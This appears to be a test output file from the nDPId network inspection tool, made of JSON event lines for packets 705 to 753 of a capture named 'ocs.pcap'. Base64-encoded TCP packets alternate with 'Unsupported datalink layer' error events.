-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":705,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMsQABABn+9wKi0ArL40DbC2QBQ64tGkd7y0YeAEC\/qqF0AAAEBCAoANZNPRwYmTw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":706,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829421} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":706,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMtQABABn+8wKi0ArL40DbC2QBQ64tGkd7y1vOAEC\/qou8AAAEBCAoANZNPRwYmUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":707,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829423} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":707,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMuQABABn+7wKi0ArL40DbC2QBQ64tGkd7y3F+AEC\/qnYIAAAEBCAoANZNQRwYmUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":708,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829438} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":708,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMvQABABn+6wKi0ArL40DbC2QBQ64tGkd7y4cuAEC\/qmBQAAAEBCAoANZNQRwYmUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":709,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829487} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":709,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMwQABABn+5wKi0ArL40DbC2QBQ64tGkd7y5zeAEC\/qkokAAAEBCAoANZNYRwYmag=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":710,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829487} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":710,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMxQABABn+4wKi0ArL40DbC2QBQ64tGkd7y7KOAEC\/qjRwAAAEBCAoANZNZRwYmag=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":711,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829488} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":711,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMyQABABn+3wKi0ArL40DbC2QBQ64tGkd7y8g+AEC\/qh7AAAAEBCAoANZNZRwYmag=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":712,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829509} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":712,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMzQABABn+2wKi0ArL40DbC2QBQ64tGkd7y93uAEC\/qgj0AAAEBCAoANZNbRwYmbw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":713,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829512} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":713,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM0QABABn+1wKi0ArL40DbC2QBQ64tGkd7y\/OeAEC\/WfOUAAAEBCAoANZNbRwYmbw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":714,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829573} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":714,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM1QABABn+0wKi0ArL40DbC2QBQ64tGkd7zAlOAEC\/qd1UAAAEBCAoANZNhRwYmeQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":715,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829578} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":715,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM2QABABn+nwKi0ArL40DbC2QBQ64tGkd7zAlOwEC\/qbmsAAAEBCAoANZNiRwYmeQEBBQre8we\/3vMNKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":716,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829657} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":716,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMM3QABABn+ewKi0ArL40DbC2QBQ64tGkd7zAlPQEC\/qUCEAAAEBCAoANZNqRwYmeQEBBRLe8x1v3vMi297zB7\/e8w0r"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":717,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829749} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":717,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM4QABABn+lwKi0ArL40DbC2QBQ64tGkd7zDSuwEC\/WOAsAAAEBCAoANZNyRwYmpQEBBQre8x1v3vMi2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":718,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829828} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":718,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM5QABABn+kwKi0ArL40DbC2QBQ64tGkd7zEpewEC\/qMmwAAAEBCAoANZN7RwYmuwEBBQre8x1v3vMi2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":719,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829873} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":719,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM6QABABn+jwKi0ArL40DbC2QBQ64tGkd7zEpewEC\/qLPwAAAEBCAoANZN\/RwYmuwEBBQre8x1v3vMoRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":720,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829921} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":720,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM7QABABn+iwKi0ArL40DbC2QBQ64tGkd7zGAOwEC\/WJ4AAAAEBCAoANZOERwYm2gEBBQre8x1v3vMoRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":721,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829922} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":721,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM8QABABn+twKi0ArL40DbC2QBQ64tGkd7zKEeAEC\/WUPEAAAEBCAoANZOERwYm2g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":722,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829961} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":722,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM9QABABn+swKi0ArL40DbC2QBQ64tGkd7zLbOAEC\/qS2EAAAEBCAoANZOIRwYm5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":723,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829962} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":723,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM+QABABn+rwKi0ArL40DbC2QBQ64tGkd7zMx+AEC\/qRfUAAAEBCAoANZOIRwYm5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":724,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829963} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":724,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM\/QABABn+qwKi0ArL40DbC2QBQ64tGkd7zOIuAEC\/WQJ0AAAEBCAoANZOIRwYm5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":725,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829990} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":725,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNAQABABn+pwKi0ArL40DbC2QBQ64tGkd7zPfeAEC\/qOxAAAAEBCAoANZOLRwYm8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":726,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829991} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":726,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNBQABABn+owKi0ArL40DbC2QBQ64tGkd7zQ2OAEC\/qNaQAAAEBCAoANZOLRwYm8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":727,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829991} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":727,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNCQABABn+nwKi0ArL40DbC2QBQ64tGkd7zSM+AEC\/WMEwAAAEBCAoANZOLRwYm8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":728,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830025} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":728,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNDQABABn+mwKi0ArL40DbC2QBQ64tGkd7zTjuAEC\/qKr8AAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":729,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830027} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":729,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNEQABABn+lwKi0ArL40DbC2QBQ64tGkd7zU6eAEC\/qJVMAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":730,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830028} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":730,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNFQABABn+kwKi0ArL40DbC2QBQ64tGkd7zWROAEC\/WH\/sAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":731,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830030} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":731,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNGQABABn+jwKi0ArL40DbC2QBQ64tGkd7zXn+AEC\/qGnsAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":732,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830031} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":732,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNHQABABn+iwKi0ArL40DbC2QBQ64tGkd7zY+uAEC\/WFSMAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":733,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830100} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":733,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNIQABABn+hwKi0ArL40DbC2QBQ64tGkd7zaVeAEC\/qD5UAAAEBCAoANZOWRwYnAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":734,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830102} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":734,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNJQABABn+UwKi0ArL40DbC2QBQ64tGkd7zaVewEC\/qOKMAAAEBCAoANZOWRwYnAAEBBQre827D3vN0Lw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":735,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830112} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":735,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNKQABABn+LwKi0ArL40DbC2QBQ64tGkd7zaVfQEC\/qYgcAAAEBCAoANZOXRwYnAAEBBRLe83mb3vN\/B97zbsPe83Qv"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":736,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830190} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":736,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNLQABABn+KwKi0ArL40DbC2QBQ64tGkd7zaVfQEC\/qXJMAAAEBCAoANZOfRwYnAAEBBRLe83mb3vOEc97zbsPe83Qv"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":737,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830453} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":737,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNMQABABn+RwKi0ArL40DbC2QBQ64tGkd7zdC+wEC\/BEl4AAAEBCAoANZO5RwYnVwEBBQre83mb3vOEcw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":738,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830495} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":738,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNNQABABn+IwKi0ArL40DbC2QBQ64tGkd7zdC\/QEC\/BGzcAAAEBCAoANZO9RwYnVwEBBRLe84nf3vOPS97zeZve84Rz"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":739,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830497} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":739,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNOQABABn+HwKi0ArL40DbC2QBQ64tGkd7zdC\/QEC\/BFcoAAAEBCAoANZO+RwYnVwEBBRLe84nf3vOUt97zeZve84Rz"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":740,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830577} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":740,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNPQABABn+OwKi0ArL40DbC2QBQ64tGkd7zdC+wEC\/BAg0AAAEBCAoANZPGRwYnVwEBBQre83mb3vOUtw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":741,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830579} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":741,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNQQABABn+FwKi0ArL40DbC2QBQ64tGkd7zdC\/QEC\/BABIAAAEBCAoANZPGRwYnVwEBBRLe849L3vOUt97zeZve85S3"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":742,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830863} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":742,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNRQABABn+YwKi0ArL40DbC2QBQ64tGkd7zlLeAEC+X44IAAAEBCAoANZPiRwYnuQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":743,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830932} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":743,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNSQABABn+XwKi0ArL40DbC2QBQ64tGkd7zmiOAEC\/q3aEAAAEBCAoANZPpRwYn1A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":744,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831004} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":744,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNTQABABn+KwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qpRAAAAEBCAoANZPwRwYn1AEBBQre85+P3vOk+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":745,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831005} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":745,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNUQABABn+JwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qn6QAAAEBCAoANZPwRwYn1AEBBQre85+P3vOqZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":746,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831056} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":746,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNVQABABn+IwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qmjIAAAEBCAoANZP2RwYn1AEBBQre85+P3vOv0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":747,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831068} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":747,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNWQABABn+HwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qlMUAAAEBCAoANZP3RwYn1AEBBQre85+P3vO1Pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":748,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831110} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":748,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNXQABABn+GwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qj1UAAAEBCAoANZP7RwYn1AEBBQre85+P3vO6qw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":749,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831118} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":749,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNYQABABn+FwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qiegAAAEBCAoANZP8RwYn1AEBBQre85+P3vPAFw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":750,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831173} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":750,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNZQABABn+EwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qhHcAAAEBCAoANZQBRwYn1AEBBQre85+P3vPFgw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":751,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831201} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":751,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNaQABABn+DwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qfwgAAAEBCAoANZQERwYn1AEBBQre85+P3vPK7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":752,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831261} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":752,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNbQABABn96wKi0ArL40DbC2QBQ64tGkd7zmiPQEC\/q+uYAAAEBCAoANZQKRwYn1AEBBRLe89Bb3vPVx97zn4\/e88rv"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":753,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831282} 